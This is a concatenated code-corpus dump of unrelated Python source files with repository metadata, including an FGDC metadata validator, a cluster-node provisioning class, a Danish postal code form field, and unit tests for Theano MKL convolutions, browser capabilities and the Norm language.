the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
str : date formated in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
| 0
| 0
| 0
|
8f8f0545a32a374fa4e403b6c4173448c8aebaaf
| 2,113
|
py
|
Python
|
lib/python/treadmill/infra/setup/node.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | 2
|
2017-10-31T18:48:20.000Z
|
2018-03-04T20:35:20.000Z
|
lib/python/treadmill/infra/setup/node.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
lib/python/treadmill/infra/setup/node.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
from treadmill.infra.setup import base_provision
from treadmill.infra import configuration, constants, instances
from treadmill.api import ipa
| 29.347222
| 67
| 0.482726
|
from treadmill.infra.setup import base_provision
from treadmill.infra import configuration, constants, instances
from treadmill.api import ipa
class Node(base_provision.BaseProvision):
def setup(
self,
image,
key,
tm_release,
instance_type,
app_root,
with_api,
ipa_admin_password,
proid,
subnet_name
):
ldap_hostname, zk_hostname = self.hostnames_for(roles=[
constants.ROLES['LDAP'],
constants.ROLES['ZOOKEEPER'],
])
_ipa = ipa.API()
_node_hostnames = self._hostname_cluster(count=1)
for _idx in _node_hostnames.keys():
_node_h = _node_hostnames[_idx]
otp = _ipa.add_host(hostname=_node_h)
self.name = _node_h
self.configuration = configuration.Node(
tm_release=tm_release,
app_root=app_root,
ldap_hostname=ldap_hostname,
otp=otp,
with_api=with_api,
hostname=_node_h,
ipa_admin_password=ipa_admin_password,
proid=proid,
zk_url=self._zk_url(zk_hostname)
)
super().setup(
image=image,
count=1,
key=key,
instance_type=instance_type,
subnet_name=subnet_name,
sg_names=[constants.COMMON_SEC_GRP],
)
def destroy(self, instance_id=None):
if instance_id:
_instances = instances.Instances.get(ids=[instance_id])
elif self.name:
_instances = instances.Instances.get(
filters=[
{
'Name': 'tag-key',
'Values': ['Name']
},
{
'Name': 'tag-value',
'Values': [self.name]
},
]
)
else:
return
_instances.terminate()
| 1,873
| 20
| 76
|
fa35d2742f0af2fece6c31ef5a0689b9bda6cc31
| 898
|
py
|
Python
|
localflavor/dk/forms.py
|
int2k/django-localflavor
|
fcda7f3aa3685f15f031b7d9b78f02e19ac5fb0b
|
[
"BSD-3-Clause"
] | 1
|
2020-07-12T23:24:38.000Z
|
2020-07-12T23:24:38.000Z
|
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | 1
|
2020-01-17T16:26:54.000Z
|
2020-01-17T16:26:54.000Z
|
"""Denmark specific Form helpers."""
from django.core.exceptions import ValidationError
from django.forms import fields, widgets
from django.utils.translation import gettext_lazy as _
from .dk_municipalities import DK_MUNICIPALITIES
from .dk_postalcodes import DK_POSTALCODES
class DKPostalCodeField(fields.CharField):
"""An Input widget that uses a list of Danish postal codes as valid input."""
default_validators = [postal_code_validator]
class DKMunicipalitySelect(widgets.Select):
"""A Select widget that uses a list of Danish municipalities (kommuner) as its choices."""
| 33.259259
| 94
| 0.759465
|
"""Denmark specific Form helpers."""
from django.core.exceptions import ValidationError
from django.forms import fields, widgets
from django.utils.translation import gettext_lazy as _
from .dk_municipalities import DK_MUNICIPALITIES
from .dk_postalcodes import DK_POSTALCODES
def postal_code_validator(value):
if value not in [entry[0] for entry in DK_POSTALCODES]:
raise ValidationError(_('Enter a postal code in the format XXXX.'))
class DKPostalCodeField(fields.CharField):
"""An Input widget that uses a list of Danish postal codes as valid input."""
default_validators = [postal_code_validator]
class DKMunicipalitySelect(widgets.Select):
"""A Select widget that uses a list of Danish municipalities (kommuner) as its choices."""
def __init__(self, attrs=None, *args, **kwargs):
super().__init__(attrs, choices=DK_MUNICIPALITIES, *args, **kwargs)
| 251
| 0
| 50
|
b8de9676b1c3db948ce6ca35eb77076d04fa3617
| 3,445
|
py
|
Python
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 8
|
2015-02-05T22:12:41.000Z
|
2015-05-15T16:15:14.000Z
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 168
|
2015-02-02T23:02:52.000Z
|
2015-05-15T21:54:07.000Z
|
test/unit/test_browser.py
|
codeforamerica/bizarro-cms
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 5
|
2016-11-20T15:51:32.000Z
|
2021-04-16T09:44:08.000Z
|
import unittest
from unittest import TestCase
from acceptance.browser import Browser
if __name__ == '__main__':
unittest.main()
| 37.043011
| 116
| 0.613933
|
import unittest
from unittest import TestCase
from acceptance.browser import Browser
class TestBrowser(TestCase):
def test_creation(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual('Windows', browser.os)
self.assertEqual('7', browser.os_version)
self.assertEqual('IE', browser.browser)
self.assertEqual('8.0', browser.browser_version)
def test_as_selenium_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_browserstack_capabilities_with_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_saucelabs_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'platform': 'Windows 7',
'browserName': 'internet explorer', 'version': '8.0', 'foo': 'bar'},
browser.as_saucelabs_capabilities({'foo': 'bar'}))
def test_doesnt_mutate_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
other_info = {'foo': 'bar'}
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0', 'foo': 'bar'},
browser.as_browserstack_capabilities(other_info))
self.assertEqual(1, len(other_info.keys()))
def test_from_string_basic(self):
browsers = Browser.from_string("all")
self.assertEqual(9, len(browsers))
browsers = Browser.from_string(None)
self.assertEqual(None, browsers)
browsers = Browser.from_string("")
self.assertEqual(None, browsers)
def test_from_string_unknown(self):
with self.assertRaises(ValueError):
Browser.from_string("arglebargle")
def test_from_string_supported(self):
browsers = Browser.from_string("supported")
self.assertEqual(8, len(browsers))
self.assertFalse(Browser('Windows', '8.1', "IE", '11.0') in browsers)
def test_from_string_with_browser(self):
browsers = Browser.from_string("ie8")
self.assertEqual([Browser('Windows', '7', "IE", '8.0')], browsers)
browsers = Browser.from_string("ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0'), Browser('Windows', '7', "IE", '11.0')], browsers)
def test_from_string_with_os(self):
browsers = Browser.from_string("win8.1")
for browser in browsers:
self.assertEqual('Windows', browser.os)
self.assertEqual('8.1', browser.os_version)
def test_from_string_with_os_and_browser(self):
browsers = Browser.from_string("win8.1/ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0')], browsers)
def test_safe_name(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual("windows_7_ie_8_0", browser.safe_name())
def test_as_string(self):
browser = Browser('Windows', '7', 'IE', '8.0')
self.assertEqual('Windows 7 IE 8.0', str(browser))
if __name__ == '__main__':
unittest.main()
| 2,929
| 7
| 373
|
23198638402b93bfa4324851435640a23d8cb61f
| 4,889
|
py
|
Python
|
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
| 36.214815
| 77
| 0.55676
|
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
def load_state_log(file_name):
history = None
with open(file_name, 'r') as f:
game={}
version=f.readline()
if len(version)==0 :
return None
game['ver']=version
game['team1_name']=f.readline().strip()
if len(game['team1_name']) == 0:
game['team1_name'] = "Team A"
game['team2_name']=f.readline().strip()
if len(game['team2_name']) == 0:
game['team2_name'] = "Team B"
players=f.readline()
if len(players)==0 :
return None
players= players.split(',')
if len(players)<2:
return None
game['n_players']=[]
if players[0].isdigit():
game['n_players'].append(int(players[0]))
else:
return None
players[1]=players[1].strip('\n')
if players[1].isdigit():
game['n_players'].append(int(players[1]))
else:
return None
settings=f.readline()
if len(settings)==0 :
return None
settings=settings.split(',')
if len(settings) < 34 :
return None
sett={}
sett['ticks_per_time']=int(settings[0])
sett['pitch_length']=float(settings[1])
sett['pitch_width']=float(settings[2])
sett['goal_width']=float(settings[3])
sett['center_radius']=float(settings[4])
sett['pole_radius']=float(settings[5])
sett['ball_radius']=float(settings[6])
sett['player_radius']=float(settings[7])
sett['catch_radius']=float(settings[8])
sett['catch_holding_ticks']=int(settings[9])
sett['kick_radius']=float(settings[10])
sett['kickable_distance']=float(settings[11])
sett['catchable_distance']=float(settings[12])
sett['kickable_angle']=float(settings[13])
sett['kickable_direction_angle']=float(settings[14])
sett['catchable_angle']=float(settings[15])
sett['net_length']=float(settings[16])
sett['catchable_area_length']=float(settings[17])
sett['catchable_area_width']=float(settings[18])
sett['corner_min_distance']=float(settings[19])
sett['throwin_min_distance']=float(settings[20])
sett['out_pitch_limit']=float(settings[21])
sett['max_dash_power']=float(settings[22])
sett['max_kick_power']=float(settings[23])
sett['player_velocity_decay']=float(settings[24])
sett['ball_velocity_decay']=float(settings[25])
sett['max_player_speed']=float(settings[26])
sett['max_ball_speed']=float(settings[27])
sett['catch_probability']=float(settings[28])
sett['player_random_noise']=float(settings[29])
sett['player_direction_noise']=float(settings[30])
sett['player_velocity_direction_mix']=float(settings[31])
sett['ball_inside_player_velocity_displace']=float(settings[32])
sett['after_catch_distance']=float(settings[33].strip('\n'))
game['sett']=sett
ticks=[]
min_line_len=offset=8+game['n_players'][0]*5+game['n_players'][1]*5+4
default_empty=[0]*min_line_len
prev_tick=default_empty
for tick in f:
tick=tick.split(',')
if len(tick) < min_line_len:
print("* error: missing data at tick: "+str(len(ticks)))
tick=prev_tick
t={}
t['score1']=int(tick[1])
t['score2']=int(tick[2])
t['state']=int(tick[3])
t['ball_x']=float(tick[4])
t['ball_y']=float(tick[5])
t['ball_velocity_x']=float(tick[6])
t['ball_velocity_y']=float(tick[7])
t['teams']=[[],[]]
offset=game['n_players'][0]*5
for which_team in range(2):
for i in range(game['n_players'][which_team]):
p={}
p['x']=float(tick[i*5+8+offset*which_team])
p['y']=float(tick[i*5+9+offset*which_team])
p['velocity_x']=float(tick[i*5+10+offset*which_team])
p['velocity_y']=float(tick[i*5+11+offset*which_team])
p['direction']=float(tick[i*5+12+offset*which_team])
t['teams'][which_team].append(p)
offset=(game['n_players'][0]+game['n_players'][1])*5
t['last_touched_team2']=bool(int(tick[8+offset]))
t['starting_team_max_range']=float(tick[9+offset])
t['ball_catched']=int(tick[10+offset])
t['ball_catched_team2']=bool(int(tick[11+offset].strip('\n')))
ticks.append(t)
prev_tick=tick
game['ticks']=ticks
history=game
return history
| 4,781
| 0
| 23
|
6d78cbb20f53042b0737e27a57734137bf0a0e4c
| 8,198
|
py
|
Python
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 64
|
2016-10-02T20:41:56.000Z
|
2020-03-11T14:59:40.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 4
|
2017-06-12T05:12:38.000Z
|
2018-03-15T03:16:30.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 30
|
2016-10-27T21:59:00.000Z
|
2021-02-20T09:55:14.000Z
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
from theano.sandbox.mkl.basic_ops import U2IConv, I2U
from theano.sandbox.mkl.mkl_conv import Conv2D
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
if __name__ == '__main__':
unittest.main()
| 44.797814
| 123
| 0.639302
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
from theano.sandbox.mkl.basic_ops import U2IConv, I2U
from theano.sandbox.mkl.mkl_conv import Conv2D
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
class test_mkl_conv_forward(unittest.TestCase):
def test_conv_U2I(self):
images = T.dtensor4('inputs')
a_internal = U2IConv(imshp=(12, 3, 256, 256),
kshp=(12, 3, 3, 3))(images)
out = I2U()(a_internal)
fopt = theano.function([images], out, mode=mode_with_mkl)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
assert numpy.allclose(fopt(ival), ival)
def test_conv_no_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut_internal = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut_internal)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOut_user, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_out)
def test_conv_with_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOutBias_internal = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOutBias_user = I2U()(convOutBias_internal)
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBias_user, mode=mode_with_mkl)
new_old = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutBias = convOut + bias.dimshuffle('x', 0, 'x', 'x')
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_old)
def test_no_shape(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
convOut = conv2d(images, weights, filter_shape=(12, 3, 3, 3), filter_flip=False)
fopt = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_with_mkl)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
# No optimization for the case image shape is None
assert all([not isinstance(n, (Conv2D, U2IConv, I2U)) for n in fopt.maker.fgraph.toposort()])
assert str(fopt.maker.fgraph.toposort()) == str(fori.maker.fgraph.toposort())
class test_mkl_conv_backward(unittest.TestCase):
def test_conv_no_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutLoss = T.mean(convOut)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
fori = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
assert new_out[0].dtype == 'float64'
# weightsGrad Layout is different.
# assert numpy.allclose(old_out[1], new_out[1])
def test_conv_with_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOut = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64) - numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutLoss = T.mean(convOut + bias.dimshuffle('x', 0, 'x', 'x'))
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
# assert numpy.allclose(old_out[1], new_out[1])
assert numpy.allclose(old_out[2], new_out[2])
assert new_out[0].dtype == 'float64'
assert new_out[2].dtype == 'float64'
if __name__ == '__main__':
unittest.main()
| 7,140
| 53
| 206
|
0a99668876349e7b2f9a56a2f17351b4ba01af2a
| 3,837
|
py
|
Python
|
tests/python_tests.py
|
reasoned-ai/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 8
|
2019-07-22T08:57:20.000Z
|
2021-03-26T13:51:02.000Z
|
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | null | null | null |
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 1
|
2019-11-16T13:37:35.000Z
|
2019-11-16T13:37:35.000Z
|
"""Unit tests for embedding Python code"""
import datetime
from pandas import DataFrame
from tests.utils import NormTestCase
| 30.696
| 70
| 0.484754
|
"""Unit tests for embedding Python code"""
import datetime
from pandas import DataFrame
from tests.utils import NormTestCase
class PythonTestCase(NormTestCase):
def test_python_declaration(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
lam = self.execute("test;")
self.assertTrue(lam is not None)
def test_python_query(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
result = self.execute("test();")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, datetime.datetime))
def test_python_query_on_data(self):
script = """
test := {{
import numpy as np
test = np.sin
}};
"""
self.execute(script)
script = """
a := (1, 2, 3)
| (1.1, 2.2, 3.3)
| (0.1, 0.2, 0.3)
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
def test_python_custom_function(self):
script = """
test := {{
def test(x):
return '{}-{}'.format(x.b, x.c)
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, DataFrame))
def test_python_function_projection(self):
script = """
utcnow := {{
from datetime import datetime
utcnow = datetime.utcnow
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
lam = self.execute("a &= utcnow()?time;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['time'] is not None)
def test_python_function_projection2(self):
script = """
gaussian := {{
import numpy as np
def gaussian(v):
return np.exp(-v*v / 2)/np.sqrt(2*np.pi)
}};
"""
self.execute(script)
script = """
a(v: Float, mu: Float) := (1.2, 2.3)
| (1.0, 2.0)
;
"""
self.execute(script)
lam = self.execute("a &= gaussian(v)?p;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['p'] is not None)
def test_python_code_expression(self):
self.execute("test(a: String, b: Integer);")
import pandas as pd
t1 = pd.DataFrame(data={'a': ['a', 'b', 'c'], 'b': [1, 2, 3]})
self.executor.python_context = locals()
lam = self.execute("test(a: String, b: Integer) := {{ t1 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'b', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
t2 = t1
t2.loc[1, 'a'] = 'e'
self.executor.python_context = locals()
lam = self.execute("test := {{ t2 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'e', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
| 3,483
| 14
| 212
|
0a67f4076fdfe5bc717c7292a9258ff71ce35595
| 10,696
|
py
|
Python
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 304
|
2020-02-07T21:05:22.000Z
|
2022-03-24T05:30:37.000Z
|
